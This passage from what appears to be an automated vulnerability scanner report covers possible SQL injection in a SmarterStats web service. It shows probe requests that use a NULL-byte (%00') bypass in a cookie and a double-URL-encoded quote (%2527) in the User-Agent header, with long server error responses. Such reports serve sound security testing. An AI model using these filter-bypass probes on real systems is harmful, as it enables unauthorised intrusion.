&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

</span>









</body>
</html>

2.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SelectedLanguage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=MoveSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=%00'; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:13 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=MoveSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=%00''; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:13 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 14519
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>MoveSite</h2>
<p class="intro">Moves one site from one Server to another Server listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/MoveSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestServerID:</td>
<td><input class="frmInput" type="text" size="50" name="DestServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestSmarterLogPath:</td>
<td><input class="frmInput" type="text" size="50" name="DestSmarterLogPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestLogFilePath:</td>
<td><input class="frmInput" type="text" size="50" name="DestLogFilePath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="DestExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="DestExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">CopyFiles:</td>
<td><input class="frmInput" type="text" size="50" name="CopyFiles"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/MoveSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestLogFilePath&gt;<font class=value>string</font>&lt;/DestLogFilePath&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSiteResult&gt;
&lt;/MoveSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestLogFilePath&gt;<font class=value>string</font>&lt;/DestLogFilePath&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSiteResult&gt;
&lt;/MoveSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/MoveSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DestServerID</font>=<font class=value>string</font>&amp;<font class=key>DestSmarterLogPath</font>=<font class=value>string</font>&amp;<font class=key>DestLogFilePath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>CopyFiles</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/MoveSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DestServerID</font>=<font class=value>string</font>&amp;<font class=key>DestSmarterLogPath</font>=<font class=value>string</font>&amp;<font class=key>DestLogFilePath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>CopyFiles</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:31 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
